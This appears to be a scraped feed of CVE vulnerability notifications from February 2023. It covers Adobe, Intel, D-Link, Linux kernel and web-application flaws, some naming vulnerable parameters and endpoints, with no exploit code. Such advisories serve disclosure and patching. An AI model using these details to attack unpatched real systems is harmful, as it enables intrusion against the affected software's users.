🚨 CVE-2023-21576Photoshop version 23.5.3 (and earlier), 24.1 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:53 |
🚨 CVE-2023-22239After Affects versions 23.1 (and earlier), 22.6.3 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:52 |
🚨 CVE-2023-21577Photoshop version 23.5.3 (and earlier), 24.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:51 |
🚨 CVE-2023-22243Adobe Animate versions 22.0.8 (and earlier) and 23.0.0 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:50 |
🚨 CVE-2023-21583Adobe Bridge versions 12.0.3 (and earlier) and 13.0.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:48 |
🚨 CVE-2023-22244Adobe Premiere Rush version 2.6 (and earlier) is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:47 |
🚨 CVE-2023-21584FrameMaker 2020 Update 4 (and earlier), 2022 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:46 |
🚨 CVE-2023-22246Adobe Animate versions 22.0.8 (and earlier) and 23.0.0 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:45 |
🚨 CVE-2023-23064TOTOLINK A720R V4.1.5cu.532_ B20210610 is vulnerable to Incorrect Access Control.🎖@cveNotify |
|
| 2023-02-17 23:29:43 |
🚨 CVE-2023-21593Adobe InDesign versions ID18.1 (and earlier) and ID17.4 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:42 |
🚨 CVE-2023-24769Changedetection.io before v0.40.1.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the main page. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the URL parameter under the "Add a new change detection watch" function.🎖@cveNotify |
|
| 2023-02-17 23:29:41 |
🚨 CVE-2023-21619FrameMaker 2020 Update 4 (and earlier), 2022 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:40 |
🚨 CVE-2023-21620FrameMaker 2020 Update 4 (and earlier), 2022 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:38 |
🚨 CVE-2023-21621FrameMaker 2020 Update 4 (and earlier), 2022 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:37 |
🚨 CVE-2023-21622FrameMaker 2020 Update 4 (and earlier), 2022 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 20:30:11 |
🚨 CVE-2021-32419An issue in Schism Tracker v20200412 fixed in v.20200412 allows attacker to obtain sensitive information via the fmt_mtm_load_song function in fmt/mtm.c.🎖@cveNotify |
|
| 2023-02-17 20:30:09 |
🚨 CVE-2021-32441SQL Injection vulnerability in Exponent-CMS v.2.6.0 fixed in 2.7.0 allows attackers to gain access to sensitive information via the selectValue function in the expConfig class.🎖@cveNotify |
|
| 2023-02-17 20:30:07 |
🚨 CVE-2021-32142Buffer Overflow vulnerability in LibRaw linux/unix v0.20.0 allows attacker to escalate privileges via the LibRaw_buffer_datastream::gets(char*, int) in /src/libraw/src/libraw_datastream.cpp.🎖@cveNotify |
|
| 2023-02-17 20:30:05 |
🚨 CVE-2021-33391An issue in HTACG HTML Tidy v5.7.28 allows attacker to execute arbitrary code via the -g option of the CleanNode() function in gdoc.c.🎖@cveNotify |
|
| 2023-02-17 20:30:03 |
🚨 CVE-2021-33391An issue in HTACG HTML Tidy v5.7.28 allows attacker to execute arbitrary code via the -g option of the CleanNode() function in gdoc.c.🎖@cveNotify |
|
| 2023-02-17 20:30:01 |
🚨 CVE-2021-33926An issue in Plone CMS v. 5.2.4, 5.2.3, 5.2.2, 5.2.1, 5.2.0, 5.1rc2, 5.1rc1, 5.1b4, 5.1b3, 5.1b2, 5.1a2, 5.1a1, 5.1.7, 5.1.6, 5.1.5, 5.1.4, 5.1.2, 5.1.1 5.1, 5.0rc3, 5.0rc2, 5.0rc1, 5.0.9, 5.0.8, 5.0.7, 5.0.6, 5.0.5, 5.0.4, 5.0.3, 5.0.2, 5.0.10, 5.0.1, 5.0, 4.3.9, 4.3.8, 4.3.7, 4.3.6, 4.3.5, 4.3.4, 4.3.3, 4.3.20, 4 allows attacker to access sensitive information via the RSS feed protlet.🎖@cveNotify |
|
| 2023-02-17 20:30:00 |
🚨 CVE-2021-33926An issue in Plone CMS v. 5.2.4, 5.2.3, 5.2.2, 5.2.1, 5.2.0, 5.1rc2, 5.1rc1, 5.1b4, 5.1b3, 5.1b2, 5.1a2, 5.1a1, 5.1.7, 5.1.6, 5.1.5, 5.1.4, 5.1.2, 5.1.1 5.1, 5.0rc3, 5.0rc2, 5.0rc1, 5.0.9, 5.0.8, 5.0.7, 5.0.6, 5.0.5, 5.0.4, 5.0.3, 5.0.2, 5.0.10, 5.0.1, 5.0, 4.3.9, 4.3.8, 4.3.7, 4.3.6, 4.3.5, 4.3.4, 4.3.3, 4.3.20, 4 allows attacker to access sensitive information via the RSS feed protlet.🎖@cveNotify |
|
| 2023-02-17 20:29:58 |
🚨 CVE-2021-33983Buffer Overflow vulnerability in Dvidelabs flatcc v.0.6.0 allows local attacker to execute arbitrary code via the fltacc execution of the error_ref_sym function.🎖@cveNotify |
|
| 2023-02-17 20:29:56 |
🚨 CVE-2021-33226Buffer Overflow vulnerability in Saltstack v.3003 and before allows attacker to execute arbitrary code via the func variable in salt/salt/modules/status.py file.🎖@cveNotify |
|
| 2023-02-17 20:29:54 |
🚨 CVE-2021-33237Cross Site Scripting vulnerability in YMFE yapo v1.9.1 allows attacker to execute arbitrary code via the remark parameter of the interface edit page.🎖@cveNotify |
|
| 2023-02-17 20:29:52 |
🚨 CVE-2021-34164Permissions vulnerability in LIZHIFAKA v.2.2.0 allows authenticated attacker to execute arbitrary commands via the set password function in the admin/index/email location.🎖@cveNotify |
|
| 2023-02-17 20:29:50 |
🚨 CVE-2021-33948SQL injection vulnerability in FantasticLBP Hotels Server v1.0 allows attacker to execute arbitrary code via the username parameter.🎖@cveNotify |
|
| 2023-02-17 20:29:48 |
🚨 CVE-2021-34182An issue in ttyd v.1.6.3 allows attacker to execute arbitrary code via default configuration permissions.🎖@cveNotify |
|
| 2023-02-17 20:29:47 |
🚨 CVE-2021-33949An issue in FeMiner WMS v1.1 allows attackers to execute arbitrary code via the filename parameter and the exec function.🎖@cveNotify |
|
| 2023-02-17 20:29:45 |
🚨 CVE-2021-35261File Upload Vulnerability in Yupoxion BearAdmin before commit 10176153528b0a914eb4d726e200fd506b73b075 allows attacker to execute arbitrary remote code via the Upfile function of the extend/tools/Ueditor endpoint.🎖@cveNotify |
|
| 2023-02-17 20:29:43 |
🚨 CVE-2021-33950An issue discovered in OpenKM v6.3.10 allows attackers to obtain sensitive information via the XMLTextExtractor function.🎖@cveNotify |
|
| 2023-02-17 20:29:42 |
🚨 CVE-2021-3172An issue in Php-Fusion v9.03.90 fixed in v9.10.00 allows authenticated attackers to cause a Distributed Denial of Service via the Polling feature.🎖@cveNotify |
|
| 2023-02-17 20:29:40 |
🚨 CVE-2021-3172An issue in Php-Fusion v9.03.90 fixed in v9.10.00 allows authenticated attackers to cause a Distributed Denial of Service via the Polling feature.🎖@cveNotify |
|
| 2023-02-17 20:29:39 |
🚨 CVE-2022-20803A vulnerability in the OLE2 file parser of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device.The vulnerability is due to incorrect use of the realloc function that may result in a double-free. An attacker could exploit this vulnerability by submitting a crafted OLE2 file to be scanned by ClamAV on the affected device. An exploit could allow the attacker to cause the ClamAV scanning process to crash, resulting in a denial of service condition.🎖@cveNotify |
|
| 2023-02-17 20:29:37 |
🚨 CVE-2022-40232IBM Sterling B2B Integrator Standard Edition 6.1.0.0 through 6.1.1.1, and 6.1.2.0 could allow an authenticated user to perform actions they should not have access to due to improper permission controls. IBM X-Force ID: 235597.🎖@cveNotify |
|
| 2023-02-17 16:29:51 |
🚨 CVE-2023-21434Improper input validation vulnerability in Galaxy Store prior to version 4.5.49.8 allows local attackers to execute JavaScript by launching a web page.🎖@cveNotify |
|
| 2023-02-17 16:29:50 |
🚨 CVE-2023-23586Due to a vulnerability in the io_uring subsystem, it is possible to leak kernel memory information to the user process. timens_install calls current_is_single_threaded to determine if the current process is single-threaded, but this call does not consider io_uring's io_worker threads, thus it is possible to insert a time namespace's vvar page to process's memory space via a page fault. When this time namespace is destroyed, the vvar page is also freed, but not removed from the process' memory, and a next page allocated by the kernel will be still available from the user-space process and can leak memory contents via this (read-only) use-after-free vulnerability. We recommend upgrading past version 5.10.161 or commit 788d0824269bef539fe31a785b1517882eafed93 https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/io_uring🎖@cveNotify |
|
| 2023-02-17 16:29:46 |
🚨 CVE-2022-40032SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information.🎖@cveNotify |
|
| 2023-02-17 16:29:45 |
🚨 CVE-2020-24307** DISPUTED ** An issue in mRemoteNG v1.76.20 allows attackers to escalate privileges via a crafted executable file. NOTE: third parties were unable to reproduce any scenario in which the claimed access of BUILTIN\Users:(M) is present.🎖@cveNotify |
|
| 2023-02-17 16:29:44 |
🚨 CVE-2023-24815Vert.x-Web is a set of building blocks for building web applications in the java programming language. When running vertx web applications that serve files using `StaticHandler` on Windows Operating Systems and Windows File Systems, if the mount point is a wildcard (`*`) then an attacker can exfiltrate any class path resource. When computing the relative path to locate the resource, in case of wildcards, the code: `return "/" + rest;` from `Utils.java` returns the user input (without validation) as the segment to lookup. Even though checks are performed to avoid escaping the sandbox, given that the input was not sanitized `\` are not properly handled and an attacker can build a path that is valid within the classpath. This issue only affects users deploying in windows environments and upgrading is the advised remediation path. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-02-17 16:29:40 |
🚨 CVE-2022-48295The IHwAntiMalPlugin interface lacks permission verification. Successful exploitation of this vulnerability can lead to filling problems (batch installation of applications).🎖@cveNotify |
|
| 2023-02-17 16:29:39 |
🚨 CVE-2023-0575External Control of Critical State Data, Improper Control of Generation of Code ('Code Injection') vulnerability in YugaByte, Inc. Yugabyte DB on Windows, Linux, MacOS, iOS (DevopsBase.Java:execCommand, TableManager.Java:runCommand modules) allows API Manipulation, Privilege Abuse. This vulnerability is associated with program files backup.Py. This issue affects Yugabyte DB: Lesser then 2.2.🎖@cveNotify |
|
| 2023-02-17 16:29:38 |
🚨 CVE-2022-48296The SystemUI has a vulnerability in permission management. Successful exploitation of this vulnerability may cause users to receive broadcasts from malicious apps, conveying false alarm information about external storage devices.🎖@cveNotify |
|
| 2023-02-17 16:29:37 |
🚨 CVE-2022-48301The bundle management module lacks permission verification in some APIs. Successful exploitation of this vulnerability may restore the pre-installed apps that have been uninstalled.🎖@cveNotify |
|
| 2023-02-17 13:30:03 |
🚨 CVE-2023-0879Cross-site Scripting (XSS) - Stored in GitHub repository btcpayserver/btcpayserver prior to 1.7.12.🎖@cveNotify |
|
| 2023-02-17 13:30:01 |
🚨 CVE-2023-0880Misinterpretation of Input in GitHub repository thorsten/phpmyfaq prior to 3.1.11.🎖@cveNotify |
|
| 2023-02-17 13:30:00 |
🚨 CVE-2022-21163Improper access control in the Crypto API Toolkit for Intel(R) SGX before version 2.0 commit ID 91ee496 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-17 13:29:58 |
🚨 CVE-2022-29494Improper input validation in firmware for OpenBMC in some Intel(R) platforms before versions egs-0.91-179 and bhs-04-45 may allow an authenticated user to potentially enable denial of service via network access.🎖@cveNotify |
|
| 2023-02-17 13:29:57 |
🚨 CVE-2022-35729Out of bounds read in firmware for OpenBMC in some Intel(R) platforms before version 0.72 may allow unauthenticated user to potentially enable denial of service via network access.🎖@cveNotify |
|
| 2023-02-17 13:29:56 |
🚨 CVE-2022-31476Improper access control in the Intel(R) SUR software before version 2.4.8902 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-02-17 13:29:54 |
🚨 CVE-2022-33190Improper input validation in the Intel(R) SUR software before version 2.4.8902 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-17 13:29:53 |
🚨 CVE-2022-33946Improper authentication in the Intel(R) SUR software before version 2.4.8902 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-17 13:29:51 |
🚨 CVE-2022-34346Out-of-bounds read in the Intel(R) Media SDK software before version 22.2.2 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-17 13:29:50 |
🚨 CVE-2022-36287Uncaught exception in the FCS Server software maintained by Intel before version 1.1.79.3 may allow a privileged user to potentially enable denial of service via physical access.🎖@cveNotify |
|
| 2023-02-17 13:29:49 |
🚨 CVE-2022-36289Protection mechanism failure in the Intel(R) Media SDK software before version 22.2.2 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-02-17 13:29:47 |
🚨 CVE-2022-35883NULL pointer dereference in the Intel(R) Media SDK software before version 22.2.2 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-02-17 13:29:46 |
🚨 CVE-2022-36382Out-of-bounds write in firmware for some Intel(R) Ethernet Network Controllers and Adapters E810 Series before version 1.7.0.8 and some Intel(R) Ethernet 700 Series Controllers and Adapters before version 9.101 may allow a privileged user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-02-17 13:29:44 |
🚨 CVE-2022-36416Protection mechanism failure in the Intel(R) Ethernet 500 Series Controller drivers for VMware before version 1.10.0.13 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-17 13:29:43 |
🚨 CVE-2022-37340Uncontrolled search path in some Intel(R) QAT drivers for Windows before version 1.6 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-17 13:29:41 |
🚨 CVE-2022-38090Improper isolation of shared resources in some Intel(R) Processors when using Intel(R) Software Guard Extensions may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-02-17 13:29:40 |
🚨 CVE-2022-41314Uncontrolled search path in some Intel(R) Network Adapter installer software may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-17 13:29:39 |
🚨 CVE-2022-41614Insufficiently protected credentials in the Intel(R) ON Event Series Android application before version 2.0 may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-02-17 13:29:38 |
🚨 CVE-2022-48325Multiple Cross Site Scripting (XSS) vulnerabilities in Mapos 4.39.0 allow attackers to execute arbitrary code. Affects the following parameters: (1) year, (2) oldSenha, (3) novaSenha, (4) termo, (5) nome, (6) cnpj, (7) ie, (8) cep, (9) logradouro, (10) numero, (11) bairro, (12) cidade, (13) uf, (14) telefone, (15) email, (16) id, (17) app_name, (18) per_page, (19) app_theme, (20) os_notification, (21) email_automatico, (22) control_estoque, (23) notifica_whats, (24) control_baixa, (25) control_editos, (26) control_edit_vendas, (27) control_datatable, (28) pix_key, (29) os_status_list, (30) control_2vias, (31) status, (32) start, (33) end in file application/controllers/Mapos.php; (34) token, (35) senha, (36) email, (37) nomeCliente, (38) documento, (39) telefone, (40) celular, (41) rua, (42) numero, (43) complemento, (44) bairro, (45) cidade, (46) estado, (47) cep, (48) idClientes, (49) descricaoProduto, (50) defeito in file application/controllers/Mine.php; (51) pesquisa, (52) status, (53) data, (54) data2, (55) dataInicial, (56) dataFinal, (57) termoGarantia, (58) garantias_id, (59) clientes_id, (60) usuarios_id, (61) idOs, (62) garantia, (63) descricaoProduto, (64) defeito, (65) observacoes, (66) laudoTecnico, (67) id, (68) preco, (69) quantidade, (70) idProduto, (71) idOsProduto, (72) produto, (73) idServico, (74) idOsServico, (75) desconto, (76) tipoDesconto, (77) resultado, (78) vencimento, (79) recebimento, (80) os_id, (81) valor, (82) recebido, (83) formaPgto, (84) tipo, (85) anotacao, (86) idAnotacao in file application/controllers/Os.php.🎖@cveNotify |
|
| 2023-02-17 13:29:36 |
🚨 CVE-2022-48326Multiple Cross Site Scripting (XSS) vulnerabilities in Mapos 4.39.0 allow attackers to execute arbitrary code. Affects the following parameters: (1) nome, (2) aCliente, (3) eCliente, (4) dCliente, (5) vCliente, (6) aProduto, (7) eProduto, (8) dProduto, (9) vProduto, (10) aServico, (11) eServico, (12) dServico, (13) vServico, (14) aOs, (15) eOs, (16) dOs, (17) vOs, (18) aVenda, (19) eVenda, (20) dVenda, (21) vVenda, (22) aGarantia, (23) eGarantia, (24) dGarantia, (25) vGarantia, (26) aArquivo, (27) eArquivo, (28) dArquivo, (29) vArquivo, (30) aPagamento, (31) ePagamento, (32) dPagamento, (33) vPagamento, (34) aLancamento, (35) eLancamento, (36) dLancamento, (37) vLancamento, (38) cUsuario, (39) cEmitente, (40) cPermissao, (41) cBackup, (42) cAuditoria, (43) cEmail, (44) cSistema, (45) rCliente, (46) rProduto, (47) rServico, (48) rOs, (49) rVenda, (50) rFinanceiro, (51) aCobranca, (52) eCobranca, (53) dCobranca, (54) vCobranca, (55) situacao, (56) idPermissao, (57) id in file application/controllers/Permissoes.php; (58) precoCompra, (59) precoVenda, (60) descricao, (61) unidade, (62) estoque, (63) estoqueMinimo, (64) idProdutos, (65) id, (66) estoqueAtual in file application/controllers/Produtos.php.🎖@cveNotify |
|
| 2023-02-17 07:29:58 |
🚨 CVE-2022-39282FreeRDP is a free remote desktop protocol library and clients. FreeRDP based clients on unix systems using `/parallel` command line switch might read uninitialized data and send it to the server the client is currently connected to. FreeRDP based server implementations are not affected. Please upgrade to 2.8.1 where this issue is patched. If unable to upgrade, do not use parallel port redirection (`/parallel` command line switch) as a workaround.🎖@cveNotify |
|
| 2023-02-17 07:29:56 |
🚨 CVE-2022-43945The Linux kernel NFSD implementation prior to versions 5.19.17 and 6.0.2 are vulnerable to buffer overflow. NFSD tracks the number of pages held by each NFSD thread by combining the receive and send buffers of a remote procedure call (RPC) into a single array of pages. A client can force the send buffer to shrink by sending an RPC message over TCP with garbage data added at the end of the message. The RPC message with garbage data is still correctly formed according to the specification and is passed forward to handlers. Vulnerable code in NFSD is not expecting the oversized request and writes beyond the allocated buffer space. CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H🎖@cveNotify |
|
| 2023-02-17 07:29:54 |
🚨 CVE-2018-3912On Samsung SmartThings Hub STH-ETH-250 devices with firmware version 0.20.17, the video-core process insecurely extracts the fields from the "shard" table of its SQLite database, leading to a buffer overflow on the stack. The strcpy call overflows the destination buffer, which has a size of 128 bytes. An attacker can send an arbitrarily long "secretKey" value in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-02-17 07:29:53 |
🚨 CVE-2018-25009A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in GetLE16().🎖@cveNotify |
|
| 2023-02-17 07:29:51 |
🚨 CVE-2020-9453In Epson iProjection v2.30, the driver file EMP_MPAU.sys allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9C402406 and IOCtl 0x9C40240A. (0x9C402402 has only a NULL pointer dereference.) This affects \Device\EMPMPAUIO and \DosDevices\EMPMPAU.🎖@cveNotify |
|
| 2023-02-17 07:29:49 |
🚨 CVE-2022-45914The ESL (Electronic Shelf Label) protocol, as implemented by (for example) the OV80e934802 RF transceiver on the ETAG-2130-V4.3 20190629 board, does not use authentication, which allows attackers to change label values via 433 MHz RF signals, as demonstrated by disrupting the organization of a hospital storage unit, or changing retail pricing.🎖@cveNotify |
|
| 2023-02-17 07:29:47 |
🚨 CVE-2023-0880Misinterpretation of Input in GitHub repository thorsten/phpmyfaq prior to 3.1.11.🎖@cveNotify |
|
| 2023-02-17 07:29:46 |
🚨 CVE-2023-0877Code Injection in GitHub repository froxlor/froxlor prior to 2.0.11.🎖@cveNotify |
|
| 2023-02-17 07:29:45 |
🚨 CVE-2023-0879Cross-site Scripting (XSS) - Stored in GitHub repository btcpayserver/btcpayserver prior to 1.7.12.🎖@cveNotify |
|
| 2023-02-17 07:29:43 |
🚨 CVE-2023-0878Cross-site Scripting (XSS) - Generic in GitHub repository nuxt/framework prior to 3.2.1.🎖@cveNotify |
|
| 2023-02-17 00:30:09 |
🚨 CVE-2022-44299SiteServerCMS 7.1.3 sscms has a file read vulnerability.🎖@cveNotify |
|
| 2023-02-17 00:30:08 |
🚨 CVE-2022-47703TIANJIE CPE906-3 is vulnerable to password disclosure. This is present on Software Version WEB5.0_LCD_20200513, Firmware Version MV8.003, and Hardware Version CPF906-V5.0_LCD_20200513.🎖@cveNotify |
|
| 2023-02-17 00:30:06 |
🚨 CVE-2023-0821HashiCorp Nomad and Nomad Enterprise 1.2.15 up to 1.3.8, and 1.4.3 jobs using a maliciously compressed artifact stanza source can cause excessive disk usage. Fixed in 1.2.16, 1.3.9, and 1.4.4.🎖@cveNotify |
|
| 2023-02-17 00:30:05 |
🚨 CVE-2023-25151opentelemetry-go-contrib is a collection of extensions for OpenTelemetry-Go. The v0.38.0 release of `go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp` uses the `httpconv.ServerRequest` function to annotate metric measurements for the `http.server.request_content_length`, `http.server.response_content_length`, and `http.server.duration` instruments. The `ServerRequest` function sets the `http.target` attribute value to be the whole request URI (including the query string)[^1]. The metric instruments do not "forget" previous measurement attributes when `cumulative` temporality is used, this means the cardinality of the measurements allocated is directly correlated with the unique URIs handled. If the query string is constantly random, this will result in a constant increase in memory allocation that can be used in a denial-of-service attack. This issue has been addressed in version 0.39.0. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-02-17 00:30:03 |
🚨 CVE-2022-30564Some Dahua embedded products have a vulnerability of unauthorized modification of the device timestamp. By sending a specially crafted packet to the vulnerable interface, an attacker can modify the device system time.🎖@cveNotify |
|
| 2023-02-17 00:30:01 |
🚨 CVE-2022-45786There are issues with the AGE drivers for Golang and Python that enable SQL injections to occur. This impacts AGE for PostgreSQL 11 & AGE for PostgreSQL 12, all versions up-to-and-including 1.1.0, when using those drivers. The fix is to update to the latest Golang and Python drivers in addition to the latest version of AGE that is used for PostgreSQL 11 or PostgreSQL 12. The update of AGE will add a new function to enable parameterization of the cypher() function, which, in conjunction with the driver updates, will resolve this issue. Background (for those who want more information): After thoroughly researching this issue, we found that due to the nature of the cypher() function, it was not easy to parameterize the values passed into it. This enabled SQL injections, if the developer of the driver wasn't careful. The developer of the Golang and Pyton drivers didn't fully utilize parameterization, likely because of this, thus enabling SQL injections. The obvious fix to this issue is to use parameterization in the drivers for all PG SQL queries. However, parameterizing all PG queries is complicated by the fact that the cypher() function call itself cannot be parameterized directly, as it isn't a real function. At least, not the parameters that would take the graph name and cypher query. The reason the cypher() function cannot have those values parameterized is because the function is a placeholder and never actually runs. The cypher() function node, created by PG in the query tree, is transformed and replaced with a query tree for the actual cypher query during the analyze phase. The problem is that parameters - that would be passed in and that the cypher() function transform needs to be resolved - are only resolved in the execution phase, which is much later. Since the transform of the cypher() function needs to know the graph name and cypher query prior to execution, they can't be passed as parameters. The fix that we are testing right now, and are proposing to use, is to create a function that will be called prior to the execution of the cypher() function transform. This new function will allow values to be passed as parameters for the graph name and cypher query. As this command will be executed prior to the cypher() function transform, its values will be resolved. These values can then be cached for the immediately following cypher() function transform to use. As added features, the cached values will store the calling session's pid, for validation. And, the cypher() function transform will clear this cached information after function invocation, regardless of whether it was used. This method will allow the parameterizing of the cypher() function indirectly and provide a way to lock out SQL injection attacks.🎖@cveNotify |
|
| 2023-02-17 00:30:00 |
🚨 CVE-2022-27538A potential Time-of-Check to Time-of-Use (TOCTOU) vulnerability has been identified in the BIOS for certain HP PC products which may allow arbitrary code execution, denial of service, and information disclosure. HP is releasing BIOS updates to mitigate the potential vulnerability.🎖@cveNotify |
|
| 2023-02-17 00:29:58 |
🚨 CVE-2023-24347D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the webpage parameter at /goform/formSetWanDhcpplus.🎖@cveNotify |
|
| 2023-02-17 00:29:57 |
🚨 CVE-2023-24345D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the curTime parameter at /goform/formSetWanDhcpplus.🎖@cveNotify |
|
| 2023-02-17 00:29:55 |
🚨 CVE-2023-24346D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the wan_connected parameter at /goform/formEasySetupWizard3.🎖@cveNotify |
|
| 2023-02-17 00:29:54 |
🚨 CVE-2023-24343D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the curTime parameter at /goform/formSchedule.🎖@cveNotify |
|
| 2023-02-17 00:29:53 |
🚨 CVE-2023-24344D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the webpage parameter at /goform/formWlanGuestSetup.🎖@cveNotify |
|
| 2023-02-17 00:29:51 |
🚨 CVE-2022-4903A vulnerability was found in CodenameOne 7.0.70. It has been classified as problematic. Affected is an unknown function. The manipulation leads to use of implicit intent for sensitive communication. It is possible to launch the attack remotely. Upgrading to version 7.0.71 is able to address this issue. The name of the patch is dad49c9ef26a598619fc48d2697151a02987d478. It is recommended to upgrade the affected component. VDB-220470 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-17 00:29:48 |
🚨 CVE-2015-10077A vulnerability was found in webbuilders-group silverstripe-kapost-bridge 0.3.3. It has been declared as critical. Affected by this vulnerability is the function index/getPreview of the file code/control/KapostService.php. The manipulation leads to sql injection. The attack can be launched remotely. Upgrading to version 0.4.0 is able to address this issue. The name of the patch is 2e14b0fd0ea35034f90890f364b130fb4645ff35. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220471.🎖@cveNotify |
|
| 2023-02-17 00:29:46 |
🚨 CVE-2023-24573Dell Command | Monitor versions prior to 10.9 contain an arbitrary folder delete vulnerability during uninstallation. A locally authenticated malicious user may potentially exploit this vulnerability leading to arbitrary folder deletion.🎖@cveNotify |
|
| 2023-02-17 00:29:44 |
🚨 CVE-2023-23698Dell Command | Update, Dell Update, and Alienware Update versions before 4.6.0 and 4.7.1 contain Insecure Operation on Windows Junction in the installer component. A local malicious user may potentially exploit this vulnerability leading to arbitrary file delete.🎖@cveNotify |
|
| 2023-02-17 00:29:43 |
🚨 CVE-2023-24569Dell Alienware Command Center versions 5.5.37.0 and prior contain an Improper Input validation vulnerability. A local authenticated malicious user could potentially send malicious input to a named pipe in order to elevate privileges on the system.🎖@cveNotify |
|
| 2023-02-17 00:29:41 |
🚨 CVE-2022-21163Improper access control in the Crypto API Toolkit for Intel(R) SGX before version 2.0 commit ID 91ee496 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-17 00:29:40 |
🚨 CVE-2022-29494Improper input validation in firmware for OpenBMC in some Intel(R) platforms before versions egs-0.91-179 and bhs-04-45 may allow an authenticated user to potentially enable denial of service via network access.🎖@cveNotify |
|
| 2023-02-17 00:29:38 |
🚨 CVE-2022-35729Out of bounds read in firmware for OpenBMC in some Intel(R) platforms before version 0.72 may allow unauthenticated user to potentially enable denial of service via network access.🎖@cveNotify |
|
| 2023-02-16 22:29:54 |
🚨 CVE-2022-32570Improper authentication in the Intel(R) Quartus Prime Pro and Standard edition software may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-16 22:29:53 |
🚨 CVE-2022-26032Uncontrolled search path element in the Intel(R) Distribution for Python programming language before version 2022.1 for Intel(R) oneAPI Toolkits may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-16 22:29:52 |
